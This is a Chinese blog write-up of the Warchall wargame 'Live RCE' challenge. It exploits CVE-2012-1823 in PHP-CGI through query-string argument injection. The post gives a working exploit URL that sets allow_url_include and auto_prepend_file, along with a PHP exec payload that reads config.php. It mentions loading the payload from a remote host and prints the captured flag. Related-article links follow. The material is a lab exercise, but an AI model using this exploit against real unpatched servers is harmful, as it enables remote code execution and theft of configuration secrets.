具体漏洞是:CVE-2012-1823(PHP-CGI RCE)

在地址后面加进参数运行对应的php-cgi 参数的行为

例如 index.php?-s

相参于/usr/bin/php53-cgi/php-cgi -f index.php -s

php-cgi --help如下:

Usage: php-cgi [-q] [-h] [-s] [-v] [-i] [-f <file>]

       php-cgi <file> [args...]

  -a               Run interactively

  -b <address:port>|<port> Bind Path for external FASTCGI Server mode

  -C               Do not chdir to the script's directory

  -c <path>|<file> Look for php.ini file in this directory

  -n               No php.ini file will be used

  -d foo[=bar]     Define INI entry foo with value 'bar'

  -e               Generate extended information for debugger/profiler

  -f <file>        Parse <file>.  Implies `-q'

  -h               This help

  -i               PHP information

  -l               Syntax check only (lint)

  -m               Show compiled in modules

  -q               Quiet-mode.  Suppress HTTP Header output.

  -s               Display colour syntax highlighted source.

  -v               Version number

  -w               Display source with stripped comments and whitespace.

  -z <file>        Load Zend extension <file>.

  -T <count>       Measure execution time of script repeated <count> times.

http://rce.warchall.net/?-s

看到index.php的源代码

基中有一个语句是:require '../config.php';

然后我们想办法读到这个文件

index.php 的绝对路径是:/home/level/20_live_rce/www/index.php
../config.php 的绝对路径是:/home/level/20_live_rce/config.ph
想办法输出config.php 的源代码。

php-cgi
参数中:d foo[=bar]     Define INI entry foo with value 'bar'
-dallow_url_include=On
dauto_prepend_file=/tmp/2.php
在/tmp里建立一个2.php内容是:
<?php

exec("cat /home/level/20_live_rce/config.php",$out);

print_r($out);

?>


提交地址:(地址里,这个/tmp/2 可以换在自己的服务 http://xxx.xxx/1.txt)


http://rce.warchall.net/?-dallow_url_include=On+-dauto_prepend_file=/tmp/2.php+-n


URLencode一下是:


http://rce.warchall.net/?-dallow_url_include%3DOn+-dauto_prepend_file%3D%2ftmp%2f2.php+-n


得到 ../config.php的源代码:




Array ( [0] => define('ICANHAZRCE', 'StrongGard_6_3');

[2] => return ICANHAZRCE;

[3] => ?> ) 


												


											
Warchall: Live RCE的更多相关文章
	

    
								
  1. RCE via XStream object deserialization && SECURITY-247 / CVE-2016-0792 XML reconstruction Object Code Inject
		
    catalogue . Java xStream . DynamicProxyConverter . java.beans.EventHandler . RCE via XStream object  ...
    
		
    2. 
						
  2. PHP FastCGI RCE Vul
		
    catalog . Introduction . nginx文件类型错误解析漏洞 . 针对直接公网开放的Fast-CGI攻击 . 通过FCGI API动态修改php.ini中的配置实现RCE 1. I ...
    
		
    3. 
						
  3. SpringSecurityOauth RCE (CVE-2016-4977) 分析与复现
		
    目录 0x00 前言 0x01 调试分析 0x02 补丁分析 0x03 参考 影响版本: 2.0.0-2.0.9 1.0.0-1.0.5 0x00 前言 这个漏洞与之前那个SpringBoot的SpE ...
    
		
    4. 
						
  4. RFI to RCE challenge
		
    http://www.zixem.altervista.org/RCE/level1.php 构造payload: https://zixem.altervista.org/RCE/level1.ph ...
    
		
    5. 
						
  5. ecshop 2.x 3.x sql injection/rce payload
		
    首先,感谢ringk3y的分析:http://ringk3y.com/2018/08/31/ec ... %E6%89%A7%E8%A1%8C/ 大家跟一遍代码基本上都能弄明白漏洞的原理,整个漏洞的构 ...
    
		
    6. 
						
  6. 挖洞姿势:特殊的上传技巧,绕过PHP图片转换实现远程代码执行(RCE)
		
    我使用了一个特殊的图片上传技巧,绕过PHP GD库对图片的转换处理,最终成功实现了远程代码执行. 事情是这样的.当时我正在测试该网站上是否存在sql注入漏洞,不经意间我在网站个人页面发现了一个用于上传 ...
    
		
    7. 
						
  7. CVE-2019-8341 Jinja2 RCE漏洞学习
		
    漏洞简述 漏洞简介 Jinja2.10版本,Environment的实例方法from_string,存在RCE,该函数在内部实现逻辑中,存在exec函数去执行了,from_string函数参数中的ji ...
    
		
    8. 
						
  8. Nuxeo 认证绕过和RCE漏洞分析(CVE-2018-16341)
		
    简介 Nuxeo Platform是一款跨平台开源的企业级内容管理系统(CMS).nuxeo-jsf-ui组件处理facelet模板不当,当访问的facelet模板不存在时,相关的文件名会输出到错误页 ...
    
		
    9. 
						
  9. 【Python】CVE-2017-10271批量自查POC(Weblogic RCE)
		
    1.说明 看到大家对weblogic漏洞这么热衷,于是也看看这个漏洞的测试方式. 找了几个安全研究员的博客分析,经过几天的摸索大体清楚漏洞由XMLDecoder的反序列化产生. 漏洞最早4月份被发现, ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 数论 UVA 10943
			
    这是一道关于组合数和隔板法的数论题目.题目说的是选出k个不同且不大于N的数字进行相加,要求这些数字之和等于N,结果要求输出这样的数有多少组.这里可以将问题利用隔板法来转换,那么题目的叙述可以转换成:这 ...
    
			
    2. 
						
  2. JS特殊函数(Function()构造函数、函数直接量)区别介绍
			
    函数定义 函数是由这样的方式进行声明的:关键字 function.函数名.一组参数,以及置于括号中的待执行代码. 函数的构造语法有这三种: 1.function functionName(arg0,  ...
    
			
    3. 
						
  3. Unity3d 引擎原理详细介绍
			
    体系结构 为了更好地理解游戏的软件架构和对象模型,它获得更好的外观仅有一名Unity3D的游戏引擎和编辑器是非常有用的,它的主要原则. Unity3D 引擎 Unity3D的是一个屡获殊荣的工具,用于 ...
    
			
    4. 
						
  4. Servlet与JSP的区别
			
    一.基本概念 1.1 Servlet Servlet是一种服务器端的Java应用程序,具有独立于平台和协议的特性,可以生成动态的Web页面.它担当客户请求(Web浏览器或其他HTTP客户程序)与服务器 ...
    
			
    5. 
						
  5. IntelliJ Idea 常用快捷键 列表(实战终极总结!!!!)
			
    IntelliJ Idea 常用快捷键 列表(实战终极总结!!!!) 1. -----------自动代码-------- 常用的有fori/sout/psvm+Tab即可生成循环.System.ou ...
    
			
    6. 
						
  6. PHP模版引擎 – Twig
			
    在网站开发过程中模版引擎是必不可少的,PHP中用的最多的当属Smarty了.目前公司系统也是用的Smarty,如果要新增一个页面只需把网站的头.尾和左侧公共部分通过Smarty的include方式引入 ...
    
			
    7. 
						
  7. python---PrettyTable
			
    简介 Python通过prettytable模块将输出内容如表格方式整齐输出,python本身并不内置,需要独立安装该第三方库. 安装 pip install PrettyTable #源码安装 wg ...
    
			
    8. 
						
  8. Eclipse中FindBugs插件的应用
			
    在以前的一个开发现场里,经常会收到客户的代码review指摘. 觉得有点神奇是,给客户的文件是编译后的*.class打成war包,客户那边却能指摘出代码中的缺陷bug,而且精确到代码的某一行. 通过* ...
    
			
    9. 
						
  9. discuz论坛与其它网站登录注册整合
			
    discuz论坛与其它网站登录注册整合 本文以discuz 7.0.0 php版本的论坛与 .net 2.0的网站注册登录整合为类.没有采用uc_center或第三方插件.以另类的方式实现.此方法实现 ...
    
			
    10. 
						
  10. Handler基本概念
			
    Handler基本概念: Handler主要用于异步消息的处理:当发出一个消息之后,首先进入一个消息队列,发送消息的函数即刻返回,而另外一个部分逐个的在消息队列中将消息取出,然后对消息进行出来,就是发 ...
    
			
    11.